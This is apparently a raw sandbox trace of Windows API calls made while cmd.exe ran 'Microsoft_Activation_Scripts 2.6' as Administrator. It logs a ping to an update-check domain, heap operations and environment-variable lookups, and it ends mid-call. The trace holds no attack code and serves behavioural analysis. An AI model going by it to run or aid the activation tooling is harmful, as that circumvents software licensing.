[0178.472] _wcsnicmp (_String1="token", _String2="skip=", _MaxCount=0x5) returned 1 [0178.472] _wcsnicmp (_String1="tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0178.472] wcstol (in: _String="2\"", _EndPtr=0x43f9efed20, _Radix=0 | out: _EndPtr=0x43f9efed20*="\"") returned 2 [0178.472] _wpopen (_Command="ping -4 -n 1 updatecheck.massgrave.dev", _Mode="rb") returned 0x7ffbed90e2a0 [0178.483] feof (_File=0x7ffbed90e2a0) returned 0 [0178.483] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.483] GetProcessHeap () returned 0x19a8f1e0000 [0178.483] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x110) returned 0x19a8f1ea8b0 [0178.483] fgets (in: _Buf=0x19a8f1ea8c0, _MaxCount=256, _File=0x7ffbed90e2a0 | out: _Buf="\r\n", _File=0x7ffbed90e2a0) returned="\r\n" [0178.823] feof (_File=0x7ffbed90e2a0) returned 0 [0178.823] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.823] GetProcessHeap () returned 0x19a8f1e0000 [0178.823] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x210) returned 0x19a8f1f9f80 [0178.823] GetProcessHeap () returned 0x19a8f1e0000 [0178.823] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9f80) returned 0x210 [0178.823] fgets (in: _Buf=0x19a8f1f9f92, _MaxCount=510, _File=0x7ffbed90e2a0 | out: _Buf="Pinging updatecheck.massgrave.dev [127.69.2.6] with 32 bytes of data:\r\n", _File=0x7ffbed90e2a0) returned="Pinging updatecheck.massgrave.dev [127.69.2.6] with 32 bytes of data:\r\n" [0178.825] feof (_File=0x7ffbed90e2a0) returned 0 [0178.825] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.825] GetProcessHeap () returned 0x19a8f1e0000 [0178.825] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9f80, Size=0x310) returned 0x19a8f200de0 [0178.825] GetProcessHeap () returned 0x19a8f1e0000 [0178.825] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x310 [0178.825] fgets (in: _Buf=0x19a8f200e39, _MaxCount=695, _File=0x7ffbed90e2a0 | out: _Buf="Reply from 127.69.2.6: bytes=32 time=1ms TTL=128\r\n", _File=0x7ffbed90e2a0) returned="Reply from 127.69.2.6: bytes=32 time=1ms TTL=128\r\n" [0178.833] feof (_File=0x7ffbed90e2a0) returned 0 [0178.833] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.833] fgets (in: _Buf=0x19a8f200e6b, _MaxCount=645, _File=0x7ffbed90e2a0 | out: _Buf="\r\n", _File=0x7ffbed90e2a0) returned="\r\n" [0178.834] feof (_File=0x7ffbed90e2a0) returned 0 [0178.834] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.834] fgets (in: _Buf=0x19a8f200e6d, _MaxCount=643, _File=0x7ffbed90e2a0 | out: _Buf="Ping statistics for 127.69.2.6:\r\n", _File=0x7ffbed90e2a0) returned="Ping statistics for 127.69.2.6:\r\n" [0178.834] feof (_File=0x7ffbed90e2a0) returned 0 [0178.834] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.834] fgets (in: _Buf=0x19a8f200e8e, _MaxCount=610, _File=0x7ffbed90e2a0 | out: _Buf=" Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\n", _File=0x7ffbed90e2a0) returned=" Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\n" [0178.834] feof (_File=0x7ffbed90e2a0) returned 0 [0178.834] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.834] fgets (in: _Buf=0x19a8f200ec8, _MaxCount=552, _File=0x7ffbed90e2a0 | out: _Buf="Approximate round trip times in milli-seconds:\r\n", _File=0x7ffbed90e2a0) returned="Approximate round trip times in milli-seconds:\r\n" [0178.835] feof (_File=0x7ffbed90e2a0) returned 0 [0178.835] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.835] GetProcessHeap () returned 0x19a8f1e0000 [0178.835] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200de0, Size=0x410) returned 0x19a8f200de0 [0178.835] GetProcessHeap () returned 0x19a8f1e0000 [0178.835] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x410 [0178.835] fgets (in: _Buf=0x19a8f200ef8, _MaxCount=760, _File=0x7ffbed90e2a0 | out: _Buf=" Minimum = 1ms, Maximum = 1ms, Average = 1ms\r\n", _File=0x7ffbed90e2a0) returned=" Minimum = 1ms, Maximum = 1ms, Average = 1ms\r\n" [0178.835] feof (_File=0x7ffbed90e2a0) returned 0 [0178.835] ferror (_File=0x7ffbed90e2a0) returned 0 [0178.835] fgets (in: _Buf=0x19a8f200f29, _MaxCount=711, _File=0x7ffbed90e2a0 | out: _Buf="", _File=0x7ffbed90e2a0) returned 0x0 [0178.887] _pclose (in: _File=0x7ffbed90e2a0 | out: _File=0x7ffbed90e2a0) returned 0 [0178.893] GetProcessHeap () returned 0x19a8f1e0000 [0178.893] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200de0, Size=0x286) returned 0x19a8f200de0 [0178.893] GetProcessHeap () returned 0x19a8f1e0000 [0178.893] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x286 [0178.893] memcpy (in: _Dst=0x19a8f200f29, _Src=0x19a8f200df0, _Size=0x139 | out: _Dst=0x19a8f200f29) returned 0x19a8f200f29 [0178.893] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\nPinging updatecheck.massgrave.dev [127.69.2.6] with 32 bytes of data:\r\nReply from 127.69.2.6: bytes=32 time=1ms TTL=128\r\n\r\nPing statistics for 127.69.2.6:\r\n Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\nApproximate round trip times in milli-seconds:\r\n Minimum = 1ms, Maximum = 1ms, Average = 1ms\r\n", cbMultiByte=313, lpWideCharStr=0x19a8f200df0, cchWideChar=313 | out: lpWideCharStr="\r\nPinging updatecheck.massgrave.dev [127.69.2.6] with 32 bytes of data:\r\nReply from 127.69.2.6: bytes=32 time=1ms TTL=128\r\n\r\nPing statistics for 127.69.2.6:\r\n Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),\r\nApproximate round trip times in milli-seconds:\r\n Minimum = 1ms, Maximum = 1ms, Average = 1ms\r\n") returned 313 [0178.893] GetProcessHeap () returned 0x19a8f1e0000 [0178.893] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0178.893] GetProcessHeap () returned 0x19a8f1e0000 [0178.893] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f207830, Size=0x78) returned 0x19a8f207830 [0178.893] GetProcessHeap () returned 0x19a8f1e0000 [0178.893] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f207830) returned 0x78 [0178.893] GetProcessHeap () returned 0x19a8f1e0000 [0178.893] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f2078c0 [0178.893] GetProcessHeap () returned 0x19a8f1e0000 [0178.893] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f2078c0, Size=0x28) returned 0x19a8f2078c0 [0178.893] GetProcessHeap () returned 0x19a8f1e0000 [0178.893] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f2078c0) returned 0x28 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207900 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f207900, Size=0x38) returned 0x19a8f207900 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f207900) returned 0x38 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207950 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f207950, Size=0x88) returned 0x19a8f207950 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f207950) returned 0x88 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20d9b0, Size=0x38) returned 0x19a8f20d9b0 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20d9b0) returned 0x38 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20da00 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20da00, Size=0x70) returned 0x19a8f20da00 [0178.894] GetProcessHeap () returned 0x19a8f1e0000 [0178.894] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20da00) returned 0x70 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20da80 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20da80, Size=0x30) returned 0x19a8f20da80 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20da80) returned 0x30 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20dac0 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20dac0, Size=0x38) returned 0x19a8f20dac0 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20dac0) returned 0x38 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20db10 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20db10, Size=0x88) returned 0x19a8f20db10 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20db10) returned 0x88 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20dbb0 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20dbb0, Size=0x38) returned 0x19a8f20dbb0 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20dbb0) returned 0x38 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20dc00 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20dc00, Size=0x90) returned 0x19a8f20dc00 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20dc00) returned 0x90 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20dca0 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20dca0, Size=0x30) returned 0x19a8f20dca0 [0178.895] GetProcessHeap () returned 0x19a8f1e0000 [0178.895] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20dca0) returned 0x30 [0178.896] GetProcessHeap () returned 0x19a8f1e0000 [0178.896] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20dce0 [0178.896] GetProcessHeap () returned 0x19a8f1e0000 [0178.896] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20dce0, Size=0x30) returned 0x19a8f20dce0 [0178.896] GetProcessHeap () returned 0x19a8f1e0000 [0178.896] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20dce0) returned 0x30 [0178.896] GetProcessHeap () returned 0x19a8f1e0000 [0178.896] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20dd20 [0178.896] GetProcessHeap () returned 0x19a8f1e0000 [0178.896] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f20dd20, Size=0x48) returned 0x19a8f20dd20 [0178.896] GetProcessHeap () returned 0x19a8f1e0000 [0178.896] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f20dd20) returned 0x48 [0178.896] lstrcmpW (lpString1="[127.69.2.6]", lpString2="[]") returned 1 [0178.896] GetProcessHeap () returned 0x19a8f1e0000 [0178.896] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f9400 [0178.896] _pipe (in: _PtHandles=0x19a8f1f9410, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x19a8f1f9410) returned 0 [0178.896] _dup (_FileHandle=1) returned 5 [0178.896] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0178.896] _close (_FileHandle=4) returned 0 [0178.896] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0178.897] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0178.897] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0178.897] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0178.897] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0178.897] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0178.897] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0178.897] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0178.897] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0178.897] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0178.897] GetProcessHeap () returned 0x19a8f1e0000 [0178.897] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20dd80 [0178.897] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0178.897] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0178.897] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0178.897] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0178.897] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0178.897] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0178.897] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0178.897] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0178.897] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0178.897] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0178.897] GetProcessHeap () returned 0x19a8f1e0000 [0178.897] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0178.897] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0178.897] GetProcessHeap () returned 0x19a8f1e0000 [0178.897] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1efd90 [0178.897] GetProcessHeap () returned 0x19a8f1e0000 [0178.897] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20be30 [0178.897] GetProcessHeap () returned 0x19a8f1e0000 [0178.897] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x86) returned 0x19a8f1eaf40 [0178.898] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f201080 [0178.898] SetErrorMode (uMode=0x0) returned 0x0 [0178.898] SetErrorMode (uMode=0x1) returned 0x0 [0178.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x19a8f201090, lpFilePart=0x43f9efe3a0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x43f9efe3a0*="system32") returned 0x13 [0178.898] SetErrorMode (uMode=0x0) returned 0x1 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f201080, Size=0x48) returned 0x19a8f201080 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f201080) returned 0x48 [0178.898] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3e) returned 0x19a8f1f8f50 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x68) returned 0x19a8f1ea8b0 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x3e) returned 0x19a8f1ea8b0 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x3e [0178.898] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1ea900 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea900, Size=0x88) returned 0x19a8f1ea900 [0178.898] GetProcessHeap () returned 0x19a8f1e0000 [0178.898] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea900) returned 0x88 [0178.898] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.899] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe120) returned 0x19a8f1f8940 [0178.899] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0178.899] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0178.899] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0178.899] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe680, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.899] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe5a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe4a0 | out: lpAttributeList=0x43f9efe5a0, lpSize=0x43f9efe4a0) returned 1 [0178.899] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe5a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe48c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe5a0, lpPreviousValue=0x0) returned 1 [0178.899] GetStartupInfoW (in: lpStartupInfo=0x43f9efe530 | out: lpStartupInfo=0x43f9efe530*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0178.899] GetProcessHeap () returned 0x19a8f1e0000 [0178.899] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1f0210 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0178.900] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0178.901] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0178.902] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0178.902] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0178.902] _wcsnicmp 